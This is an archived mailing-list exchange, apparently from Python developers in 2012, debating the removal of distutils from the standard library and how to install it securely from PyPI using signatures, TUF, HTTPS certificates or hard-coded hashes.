On Tue, Nov 13, 2012 at 12:23 PM, "Martin v. Löwis" <martin@v.loewis.de> wrote:
It depends on the threat model - whose definition is key to any securityI want to remove distutils from the standard library. If that happens
then we might want a secure way to install it from pypi. One way would
be to include the public key used to sign distutils in Python's own
signature-verifying bootstrap wheel installer, never mind whether it
used ECDSA or RSA or Ed25519. Do you have a better idea? TUF?
https://www.updateframework.com/wiki/SecuringPythonPackageManagement
discussion.
I'd say that providing the CA certificate of the CA, and to use https
for downloading, should be enough.
Alternatively, if the threat is that somebody may have hacked PyPI,
then hard-code the hash (SHA-3 if you are paranoid) in the Python
distribution, and rely on downloading a specific version from PyPI.
OTOH, I'm -1 on removing the code from Python in a way that it may
come back through downloading. Instead, it is much easier to keep
it included.